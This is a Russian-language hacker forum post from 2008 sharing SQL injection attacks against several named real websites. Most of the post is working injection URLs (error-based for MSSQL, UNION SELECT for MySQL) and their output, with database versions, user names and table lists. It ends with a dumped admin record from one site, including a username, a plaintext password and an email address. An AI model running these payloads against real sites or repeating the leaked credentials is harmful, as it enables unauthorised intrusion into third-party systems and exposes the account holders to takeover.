|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
mega.km.ru
Код:
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version
@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() ojigov
system_user mega_link
через
Код:
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('dtproperties'))--
нашел таблицы:
dtproperties
Rubr
RubrLinksStat
Search
Stat
StatOrder
sysconstraints
syssegments
но интересных колонок в них не нашел=/
p.s. в mssql я очень плохо разбираюсь, это вобще моя первая mssql inj, так что не судите строго, делал всё согласно статье от [ cash ]
sosna1.ru
version() 5.0.45-log
user() u71952@10.10.223.224
database() u71952
Код:
http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/*
ethanol.org
version() 4.1.15
user() ETHANOL@LOCALHOST
database() ETHANOLDB
djbattle.net
version() 4.1.12
user() djbattle@localhost
database() djbattle
Код:
http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/*
нашел таблицу users.
Код:
http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(concat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binary),5,6,7,8,9,10,11+from+users/*
id:user:рass:mail
3: tobbe: 1skills2:info@djbattle.net
он видимо админ
Последний раз редактировалось nex0; 12.02.2008 в 22:19..
|